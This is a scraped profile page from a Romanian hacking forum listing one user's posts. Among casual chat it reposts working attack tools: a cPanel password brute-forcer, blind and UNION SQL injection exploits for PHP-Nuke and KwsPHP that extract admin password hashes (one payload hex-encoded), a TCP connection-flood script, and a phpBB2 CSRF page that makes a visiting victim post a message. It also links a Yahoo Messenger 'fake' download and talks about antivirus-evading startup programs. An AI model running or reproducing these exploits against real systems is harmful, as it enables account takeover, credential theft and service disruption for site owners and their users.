Everything posted by Ras
-
Link: http://www.youtube.com/watch?v=16xOp9RqcY8 Aseara... Detalii aveti acolo.
-
#!/usr/bin/perl # Cpanel Password Brute Forcer # ---------------------------- # (c)oded By Hessam-x # Perl Version ( low speed ) # Oerginal Advisory : use IO::Socket; use LWP::Simple; use MIME::Base64; $host = $ARGV[0]; $user = $ARGV[1]; $port = $ARGV[2]; $list = $ARGV[3]; $file = $ARGV[4]; $url = "http://".$host.":".$port; if(@ARGV < 3){ print q( ############################################################### # Cpanel Password Brute Force Tool # ############################################################### # usage : cpanel.pl [HOST] [User] [PORT][list] [File] # #-------------------------------------------------------------# # [Host] : victim Host (simorgh-ev.com) # # [User] : User Name (demo) # # [PORT] : Port of Cpanel (2082) # #[list] : File Of password list (list.txt) # # [File] : file for save password (password.txt) # # # ############################################################### # (c)oded By Hessam-x / simorgh-ev.com # ############################################################### );exit;} headx(); $numstart = "-1"; sub headx() { print q( ############################################################### # Cpanel Password Brute Force Tool # # (c)oded By Hessam-x / simorgh-ev.com # ############################################################### ); open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !"; @PASSWORDS = <PASSFILE>; close PASSFILE; foreach my $P (@PASSWORDS) { chomp $P; $passwd = $P; print " [~] Try Password : $passwd "; &brut; }; } sub brut() { $authx = encode_base64($user.":".$passwd); print $authx; my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print " [-] Can not connect to the host"; print $sock "GET / HTTP/1.1 "; print $sock "Authorization: Basic $authx "; print $sock "Connection: Close "; read $sock, $answer, 128; close($sock); if ($answer =~ /Moved/) { print " [~] PASSWORD FOUND : $passwd "; exit(); } } Nu am testat.
-
Nemessis, tu crezi ca in China sau in USA sau in alte tari nu sunt copii ca la noi? Eu cred ca da, iar acolo sunt multi chiar sub nivelul nostru. Si inca ceva... tu spui ca ai fost betiv, drogat, exmatriculat, etc. Cumva tu ai invatat cate ceva din chestiile alea... adica dupa ce ti-ai dat seama ca nu e bine te-ai indreptat... eu cred ca e mai bine sa trecem prin toate si dupa aia sa tragem o linie si sa ne putem indrepta.
-
Yahoo!Messenger Monitor Sniffer v3.0 (Am pus serial number)
Ras replied to EthicalHacker's topic in Programe hacking
deci daca te loghezi in acest program se salveaza un fisier .txt in partitia C: cu numele Yahoo.txt -
#!/usr/bin/perl #0day exploit for PHP-nuke <=8.0 Final #Blind sql injection attack in INSERT syntax #version for mysql >= 4.0.24, using 'brute force' #Coded by:Maciej `krasza` Kukla[krasza@gmail.com] #Screenshot: #0day exploit for PHP-nuke <=8.0 Final #Sql injection attack in INSERT syntax #Coded by:Maciej `krasza` Kukla[krasza@gmail.com] # #[+]Time normal query: 2 seconds #[+]Length user's record: 5 #[+]Length password's record: 32 #[+]Login: #admin #[+]Password: #b481ab90de84a345c665f1e4ef3c2 #[+]Super admin: #admin:b481ab90de84a345c66585e1f4cf16e4 use strict; use warnings; use LWP; my $offset=4;#It is the most important variable!! my $adres=shift or help(); my $ua = LWP::UserAgent->new; my $zadanie = HTTP::Request->new(GET => $adres); my ($respone,$komenda,$poczatek,$koniec,$czas_nor,$i,$j,$dlugosc_user,$user, $hash,$referer,$czy_dziala,$znak); banner(); $czas_nor=polacz("http://www.krasza.int.pl"); print "[+]Time normal query: $czas_nor seconds\n"; $dlugosc_user=ustal_dlugosc("aid",8); print "[+]Length user's record: $dlugosc_user\n"; print "[+]Length password's record: 32\n"; print "[+]Login:\n"; $user=brute_force_aid($dlugosc_user); print "[+]Password:\n"; $hash=brute_force_pass(32); print "[+]Super admin:\n"; print "$user:$hash\n"; ## sub brute_force_pass{ my ($dlugosc)=@_; my ($i,$j,$referer,$wynik,$dolny_zakres); for($i=1;$i<=$dlugosc;$i++){ for($j=48;$j<=122;$j++){ $referer="http://www.krasza.int.pl'),(-1, (SELECTIF((ASCII(SUBSTRING(`pwd`,".$i.", 1))=".$j.") & 1, benchmark(50000000,CHAR(0)),0) FROM `nuke_authors` WHERE `radminsuper`=1))/*"; $czy_dziala=czy_dziala($referer); if($czy_dziala==1){ $znak=chr($j); print "$znak"; $wynik.=$znak; if($i<$dlugosc){ $i+=1; $j=47; }else{ last; } } #przeskok-optymalizacja;] if($j==57){ $j=96; } } } print "\n"; return $wynik; } sub brute_force_aid{ my ($dlugosc)=@_; my ($i,$j,$referer,$wynik,$dolny_zakres); for($i=1;$i<=$dlugosc;$i++){ for($j=48;$j<=122;$j++){ $referer="http://www.krasza.int.pl'),(-1, 
(SELECTIF((ASCII(SUBSTRING(`aid`,".$i.", 1))=".$j.") & 1, benchmark(50000000,CHAR(0)),0) FROM `nuke_authors` WHERE `radminsuper`=1))/*"; $czy_dziala=czy_dziala($referer); if($czy_dziala==1){ $znak=chr($j); print "$znak"; $wynik.=$znak; if($i<$dlugosc){ $i+=1; $j=47; }else{ last; } } if($j==57){ $j=64; } if($j==90){ $j=96; } } } print "\n"; return $wynik; } sub ustal_dlugosc{ my ($pole,$len)=@_; my ($referer,$narazie_dziala_liczba,$nie_dziala_liczba); $narazie_dziala_liczba=0; $nie_dziala_liczba=65; #for($len=1;$len<64;$len++){ while($len<=64){ if($narazie_dziala_liczba==$len || $nie_dziala_liczba<=$len){ return $narazie_dziala_liczba; } $referer="http://www.krasza.int.pl'),(-1, (SELECTIF((LENGTH(`".$pole."`)>". $len.") & 1, benchmark(50000000,CHAR(0)),0) FROM `nuke_authors` WHERE `radminsuper`=1))/*"; $czy_dziala=czy_dziala($referer); if($czy_dziala==1){ $narazie_dziala_liczba=$len+1; $len+=2; }else{ $nie_dziala_liczba=$len+1; $len-=1; } } print "[-]Exploit Failed\n"; exit; } sub czy_dziala{ my ($refik)=@_; my $czas_zapytania; $czas_zapytania=polacz($refik); if($czas_zapytania>$czas_nor+$offset){ return 1; }else{ return 0; } } sub polacz{ my ($referrer)=@_; my ($czas,$czas_poczatek,$czas_koniec); $zadanie->referer($referrer); $czas_poczatek=time(); $respone=$ua->request($zadanie); $respone->is_success or die "$adres : ",$respone->message,"\n"; $czas_koniec=time(); $czas=$czas_koniec-$czas_poczatek; return $czas; } sub banner{ print "0day exploit for PHP-nuke <=8.0 Final\n"; print "Blind sql injection attack in INSERT syntax\n"; print "version mysql >= 4.0.24, using 'brute force'\n"; print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n\n"; } sub help{ print "0day exploit for PHP-nuke <=8.0 Final\n"; print "Blind sql injection attack in INSERT syntax\n"; print "version mysql >= 4.0.24, using 'brute force'\n"; print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n"; print "Use:\n"; print "\tperl exploit.pl [url]\n"; print "\t[url]-vicitim webpage with 
index.php\n"; print "Example:\n"; print "\tperl bruteforce.pl http://phpnuke.org/index.php\n"; exit(0); }
-
Yahoo!Messenger Monitor Sniffer v3.0 (Am pus serial number)
Ras replied to EthicalHacker's topic in Programe hacking
Download: http://rapidshare.com/files/57175959/Yahoo_Fake.rar trebuia sa cauti pe forum pt ca exista sigur... -
s-a postat acum ceva timp pe rst o metoda in care puneai nush ce combinatie de cifre si nu mai puteai sa apelezi si nici sa primesti apeluri.
-
Yahoo! Messenger 8.1.0.421 CYFT Object Arbitrary File Downlo
Ras replied to nullbyte's topic in Exploituri
Contine "GetFile()" si prin acest "GetFile()" poti sa downloadezi din calculatorul victimei. Remote execution depinde de setarile IE-ului... -
Yahoo! Messenger 8.1.0.421 CYFT Object Arbitrary File Downlo
Ras replied to nullbyte's topic in Exploituri
imi explica si mie cineva ce face acest exploit? ca sa nu mor prost... -
titlul este pus la misto... nu ai vazut acele ""?
-
poate ai dat tu alt nume la exploit... cand i-ai dat copy si paste si dupaia save ... ce nume i-ai dat? verifica...
-
Eu am nod32 versiunea 2539 si nu-l detecteaza...nu stiu ce sa zic...nici nu m-am obosit sa vad daca il detecteaza sau nu...pentru ca nu e cine stie, are cateva functii, e facut de mine si in plus e si criptat...Cred ca o fi de la functia care il face sa ruleze la startup. Limo11 nu ai citit ce a scris escalation... il detecteaza nortonul pentru ca are functia care il face sa ruleze la startup. Stiu treaba asta pt ca acum ceva timp am facut niste "virusi"(sa zic asa) care aveau functie de startup si doar nod32-ul ii detecta.
-
cred ca sunt 4 ani
-
primul meu telefon nokia 3310
-
@Renegade: ma distrez si eu acum cat sunt mic.... @katmai: administratoru' a vrut sa ne puna banci dar nu acolo unde am pus-o noi... vroia sa faca cerere la primarie si sa faca parc pe terenu' nostru de fotbal... si noi nu am vrut ). Asta era acum cativa ani si nu vroiam noi... dar acum ne pare rau
-
Link: http://www.youtube.com/watch?v=9_yQDnfe2xA Link: http://speed-blog.net/2007/09/18/nu-avem-banca-pai-furam-una-atunci/ In seara asta eu si cu tov mei nu aveam ce sa facem si ne-am hotarat sa... vedeti in acel video...
-
marfa!! de-abia astept sa il trimit la manelisti :twisted: :twisted:
-
#!/usr/bin/perl use IO::Socket::INET; print "host: "; chomp($host=<STDIN>); print "port: "; chomp($port=<STDIN>); print "packets: "; chomp($packets=<STDIN>); print "Start flood target -> $host:$port\n"; $x = 0; while ($x < $packets) { $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port); $x += 1; } if ($x eq $packets) { print "$packets packet[s] send successfully"; } else { print "There is a problem with packet`s sending"; } close($socket); search pe google... EDIT Download Perl: http://rapidshare.com/files/56619845/Perl.rar
-
--------------------------------------------------------------- ____ __________ __ ____ __ /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ | | | \ | |/ \ \___| | /_____/ | || | |___|___| /\__| /______ /\___ >__| |___||__| \/\______| \/ \/ --------------------------------------------------------------- [url]Http://www.inj3ct-it.org[/url] Staff[at]inj3ct-it[dot]org -------------------------------------------------------------- 0day Auto Sender Post phpBB2 --------------------------------------------------------------- # Coded by TuoNuX # Description: autosendform generator --------------------------------------------------------------- --------------------------------------------------------------- asf.pl --------------------------------------------------------------- #/usr/bin/perl #0day Auto Sender Post phpBB2 #TuoNuX@hotmail.it #[url]http://www.localh0st.altervista.org[/url] #[url]http://www.hackingz0ne.altervista.org[/url] print q { _____________________________________________________________________ ___ _ _ __ _ |_ _|_ _ ___ | \ | _ _ \ \/ * 0day Auto Sender Post phpBB2 | || | |/ . 
\| || | | \ \ * [email]TuoNuX@hotmail.it[/email] |_|`___|\___/|_\_|`___|_/\_\ * [url]http://www.localh0st.altervista.org[/url] * [url]http://www.hackingz0ne.altervista.org[/url] 0day Auto Sender Post phpBB2 _____________________________________________________________________ }; print q { [+]Insert host site : [-]Indirizzo: }; $indirizzo = <stdin>; chomp($indirizzo); print q { _____________________________________________________________________ [+]Insert the forum path (for example /phpBB/) : [-]Cartella: }; $cartella = <stdin>; chomp($cartella); print q { _____________________________________________________________________ [+]Insert ID section ( number after "?f=" ): [-]ID Sezione: }; $id = <stdin>; chomp($id); print q { _____________________________________________________________________ [+]Insert Topic Title : [-]Titolo: }; $titolo = <stdin>; chomp($titolo); print q { _____________________________________________________________________ [+]Insert the body topic : [+]Yuc can use also the BB code es: [img=urlimmagine] [-]Testo: }; $testo = <stdin>; chomp($testo); print q { _____________________________________________________________________ [+]Insert the victim sid , don't write everyone if there isn't it : [-]Sid: }; $sid = <stdin>; chomp($sid); $sito = "http://$indirizzo$cartella"; print "\n----------------Riepilogo----------------------\n\n"; print "Forum => $sito\n"; print "ID Section => $id\n"; print "Title => $titolo\n"; print "Message => $testo\n"; print "SID => $sid\n\n"; print "----------------Riepilogo----------------------\n\n"; print "Enter for continued...."; <stdin>; $m1 = q {<html><head><body><form action="}; $m2 = "$sito"; $m3 = q {posting.php" method="post" name="post"><textarea name="message" class="post">}; $m4 = "$testo"; $m5 = q {</textarea><input type="hidden" value="}; $m12 = "\n\nTuoNuX 0day phpBB2 Exploit\n\n\n"; $m6 = "$titolo"; $m7 = q {" class="post" tabindex="2" style="width: 450px;" maxlength="60" size="45" name="subject"/><input 
type="hidden" value="" class="post" maxlength="255" size="50" name="poll_title"/><input type="hidden" value="" class="post" maxlength="255" size="50" name="add_poll_option_text"/><input type="hidden" value="0" class="post" maxlength="3" size="3" name="poll_length"/><input type="hidden" value="Anteprima" class="mainoption" name="preview" tabindex="5"/><input type="hidden" value="Invia" class="mainoption" name="post" tabindex="6" accesskey="s"/><input type="hidden" name="mode" value="newtopic" /><input type="hidden" name="f" value="}; $m8 = "$id"; $m9 = q {"> <input type="hidden" name="sid" value="}; $m10 = "$sid"; $m11 = q {" /></form><script>document.post.submit()</script></html></head></body>}; $html = "$m1$m2$m3$m4$m12$m5$m6$m7$m8$m9$m10$m11"; open ( FILE , ">phpBB20dayexploit.html" ) || die ( "" ); print FILE $html; close ( FILE ); print q { _____________________________________________________________________ ___ _ _ __ _ |_ _|_ _ ___ | \ | _ _ \ \/ * 0day Auto Sender Post phpBB2 | || | |/ . \| || | | \ \ * [email]TuoNuX@hotmail.it[/email] |_|`___|\___/|_\_|`___|_/\_\ * [url]http://www.localh0st.altervista.org[/url] * [url]http://www.hackingz0ne.altervista.org[/url] 0day Auto Sender Post phpBB2 Page Saved !!!!... Work this script on a webspace and you must visit it to victim. Best ReGaRdS FoR localh0st & hackingz0ne _____________________________________________________________________
-
cam naspa treaba... poate omu e incepator si d'asta hexeaza.
-
stats module: ################################################### # Script..........................: KwsPHP ver 1.0 stats Module # Script Site..................: [url]http://kws.koogar.org/[/url] # Vulnerability...............: Remote SQL injection Exploit # Access.........................: Remote # level.............................: Dangerous # Author..........................: S4mi # Contact.........................: S4mi[at]LinuxMail.org #################################################### #Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, E.chark, r0_0t, ddx39 # #################################################### # This Exploit Work Only When magic_quotes_gpc Is OFF # #Usage : C:\Xploit.pl 127.0.0.1 /KswPHP/ admin #Result Screen Shot : #+**********************+ # Connecting ...[OK] # Sending Data ...[OK] # # + Exploit succeed! Getting admin information. # + ---------------- + # + Username: admin # + Password: e10adc3949ba59abbe56e057f20f883e ################################################### #vuln code : \modules\stats\index.php line ~ 700 - 720 #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # [code] # elseif(isset($aff) && ($aff=="browser")) # { # if(isset($typenav)) # { # bloc_head("Statistiques des navigateurs ".$liste_navigateurs[$typenav]); # # $tot_nav=0; # # $requete=reqmysql("SELECT SUM(hit) as tot FROM `stats` where type='nav' and valeur like '$typenav**%' ORDER BY `type` ASC "); # # while ($ligne = mysql_fetch_object($requete)) # { # $tot_nav = $ligne->tot; # } # $requete=reqmysql("SELECT * FROM `stats` where type='nav' and valeur like '$typenav**%' ORDER BY `hit` DESC"); # ######################################################### #!/usr/bin/perl use IO::Socket ; &header(); &usage unless(defined($ARGV[0] && $ARGV[1] && $ARGV[2])); $host = $ARGV[0]; $path = $ARGV[1]; $user = $ARGV[2]; syswrite STDOUT ,"\n Connecting ..."; my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); die "\n Unable to connect to 
$host\n" unless($sock); syswrite STDOUT, "[OK]"; $inject = "9999'/**/UNION/**/SELECT/**/0,0,pass,pseudo/**/FROM/**/users/**/WHERE/**/pseudo='$user'/*"; syswrite STDOUT ,"\n Sending Data ..."; print $sock "POST $path/index.php?mod=stats&aff=browser&typenav=$inject HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Cache-Control: no-cache\n"; print $sock "Connection: Close\n\n"; syswrite STDOUT ,"[OK]\n\n"; while($answer = <$sock>){ if ($answer =~ /nav_(.*?).png/){ print "+ Exploit succeed! Getting admin information.\n"; print "+ ---------------- +\n"; print "+ Username: $user\n"; print "+ Password: $1\n"; print "+ ----Have Fun---- +\n"; print "+ You don't need to crack the hash password \n"; print "+ Just login with ur owen information and edit the cookies\n"; } } sub usage{ print "\nUsage : perl $0 host /path/ UserName "; print "\nExemple : perl $0 www.victim.com /KwsPHP/ admin\n"; exit(0); } sub header(){ print q( ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Script......................: KwsPHP ver 1.0 stats Module # Script Site.................: http://kws.koogar.org/ # Vulnerability...............: Remote SQL injection Exploit # Access......................: Remote # level.......................: Dangerous # Author......................: S4mi # Contact.....................: S4mi[at]LinuxMail.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ); } member_space module: #!/usr/bin/perl use LWP::UserAgent; use HTTP::Cookies; $host = $ARGV[0]; $User = $ARGV[1]; $passwd = $ARGV[2]; $url = "http://".$host; $port = "80"; print q( ################################################################ # Script....................: KwsPHP v1.0 Member_Space Module # # Script Site...............: 
[url]http://kws.koogar.org/[/url] # # Vulnerability.............: Remote SQL injection Exploit # # Access....................: Remote # # level.....................: Dangerous # # Author....................: S4mi # # Contact...................: S4mi[at]LinuxMail.org # # This Exploit Work Only When magic_quotes_gpc Is OFF # ################### (C)oded By S4mi ############################ ); if (@ARGV < 3) { print " # usage : xpl.pl host/path/ User Passwd\n"; print " # e.g : xpl.pl 127.0.0.1/KwsPHP/ zaz luks\n"; exit(); } print " [~] User/Password : $User/$passwd \n"; print " [~] Host : $url \n"; $xpl = LWP::UserAgent->new() or die; $cookie_jar = HTTP::Cookies->new(); print " [~] Logining ...\n"; $xpl->cookie_jar( $cookie_jar ); $login = $xpl->post($url.'index.php', Content => [ "pseudo" => "$User", "pass" => "$passwd", "submit" => "Se connecter", ],); $evil0 = "\x39\x39\x39\x39\x39\x27\x2F\x2A\x2A\x2F\x55\x4E\x49\x4F\x4E" ."\x2F\x2A\x2A\x2F\x53\x45\x4C\x45\x43\x54\x2F\x2A\x2A\x2F\x6E" ."\x75\x6C\x6C\x2C\x63\x6F\x6E\x63\x61\x74\x28\x63\x68\x61\x72" ."\x28\x31\x31\x37\x2C\x31\x31\x35\x2C\x31\x30\x31\x2C\x31\x31" ."\x34\x2C\x31\x31\x30\x2C\x39\x37\x2C\x31\x30\x39\x2C\x31\x30" ."\x31\x2C\x35\x38\x29\x2C\x70\x73\x65\x75\x64\x6F\x2C\x63\x68" ."\x61\x72\x28\x31\x32\x37\x29\x29\x2C\x63\x6F\x6E\x63\x61\x74" ."\x28\x63\x68\x61\x72\x28\x31\x31\x32\x2C\x39\x37\x2C\x31\x31" ."\x35\x2C\x31\x31\x35\x2C\x31\x31\x39\x2C\x31\x31\x31\x2C\x31" ."\x31\x34\x2C\x31\x30\x30\x2C\x35\x38\x29\x2C\x70\x61\x73\x73" ."\x2C\x63\x68\x61\x72\x28\x31\x32\x37\x29\x29\x2C\x6E\x75\x6C" ."\x6C\x2F\x2A\x2A\x2F\x46\x52\x4F\x4D\x2F\x2A\x2A\x2F\x75\x73" ."\x65\x72\x73\x2F\x2A\x2A\x2F\x57\x48\x45\x52\x45\x2F\x2A\x2A" ."\x2F\x69\x64\x3D\x31\x2F\x2A"; $offset = "\x65\x73\x70\x61\x63\x65\x5F\x6D\x65\x6D\x62\x72\x65\x26\x61" ."\x63\x3D\x63\x61\x72\x6E\x65\x74\x26\x61\x63\x74\x3D\x65\x64" ."\x69\x74\x65\x72\x26\x69\x64\x3D"; $target = $xpl->get($url."index.php?mod=$offset$evil0"); if($target->as_string =~ 
/value="username:(.*?"/) { $zaz = $1; print " [+] Exploit succeed! Getting admin information. \n"; print " [+] ------------------------------------------- \n"; } if($target->as_string =~ /value="password:(.*?"/) { $luks = $1; print " [+] UserName : $zaz \n"; print " [+] Password : $luks \n"; } else { print " [-] Exploit Failed ! \n"; } print "\n#############################################################\n"; login.php: ################################################### # Script..........................: KwsPHP ver 1.0 # Script Site..................: [url]http://kws.koogar.org/[/url] # Vulnerability...............: login.php Remote SQL injection Exploit # Access.........................: Remote # level.............................: Dangerous # Author..........................: S4mi # Contact.........................: S4mi[at]LinuxMail.org #################################################### #Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, E.chark, r0_0t, ddx39 # #################################################### # This Exploit work Only When magic_quotes_gpc Is OFF # #Usage : C:\Xploit.pl 127.0.0.1 /KswPHP/ admin #Result Screen Shot : #+**********************+ # Connecting ...[OK] # Sending Data ...[OK] # # + Exploit succeed! Getting admin information. 
# + ---------------- + # + Username: admin # + Password: e10adc3949ba59abbe56e057f20f883e ################################################### #!/usr/bin/perl use IO::Socket ; &header(); &usage unless(defined($ARGV[0] && $ARGV[1] && $ARGV[2])); $host = $ARGV[0]; $path = $ARGV[1]; $user = $ARGV[2]; syswrite STDOUT ,"\n Connecting ..."; my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); die "\n Unable to connect to $host\n" unless($sock); syswrite STDOUT, "[OK]"; $inject = "union%20all%20select%200,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users%20where%20pseudo='$user'/*&pass=ZAZ&verifer=Se%20Loguer"; syswrite STDOUT ,"\n Sending Data ..."; print $sock "POST $path/login.php?pseudo=%22$inject HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Cache-Control: no-cache\n"; print $sock "Connection: Close\n\n"; syswrite STDOUT ,"[OK]\n\n"; while($answer = <$sock>){ if ($answer =~ /class="messagelogin">(.*?) /){ print "+ Exploit succeed! 
Getting admin information.\n"; print "+ ----------------------- +\n"; print "+ Username: $user\n"; print "+ Password: $1\n"; print "+ -------Have Fun--------- +\n"; print "+ You don't need to crack the hash password \n"; print "+ Just login with ur owen information and edit the cookies\n"; } } sub usage{ print "\nUsage : perl $0 host /path/ UserName "; print "\nExemple : perl $0 [url]www.victim.com[/url] /KwsPHP/ admin\n"; exit(0); } sub header(){ print q( ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Script......................: KwsPHP ver 1.0 # Script Site.................: [url]http://kws.koogar.org/[/url] # Vulnerability...............: Remote SQL injection Exploit # Access......................: Remote # level.......................: Dangerous # Author......................: S4mi # Contact.....................: S4mi[at]LinuxMail.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ); }
-
# Chupix CMS 0.2.3 (download.php) Remote File Download Vulnerability# P.Script : http://sourceforge.net/project/showfiles.php?group_id=134930 ################################download.php################################ Lain:18->57 -> ******************************************************************************************************************** if(isset($_GET['fichier'])){ <--------------XXXX * // téléchargement du fichier * $file = "archives/". $_GET['repertoire'] ."/". $_GET['fichier'];<--------------XXXX * $fichier_txt = "archives/". $_GET['repertoire'] ."/cpt/". $_GET['fichier'] .".php" * $repertoire = "archives/". $_GET['repertoire'] ."/cpt/"; * if(is_file($fichier_txt)){ * $fp = @fopen($fichier_txt, "r"); <--------------XXXX * $result = fread($fp, filesize ($fichier_txt)); * fclose($fp); * $result = str_replace("<?php ", "", $result); * $result = str_replace("?>", "", $result); * * $num = trim($result); * }else{ * $num = 0; * } * $num++; * * $msg = "<?php ". $num ." ?>"; * * if(!(is_dir($repertoire))){ * mkdir ($repertoire, 0755); * } * * $fp = @fopen($fichier_txt, "w+");<--------------XXXX * if (flock($fp, LOCK_EX)) { // pose un verrou exclusif * fwrite($fp, $msg); * flock($fp, LOCK_UN); // lib
-
la 5 ani... :shock: :shock: :shock: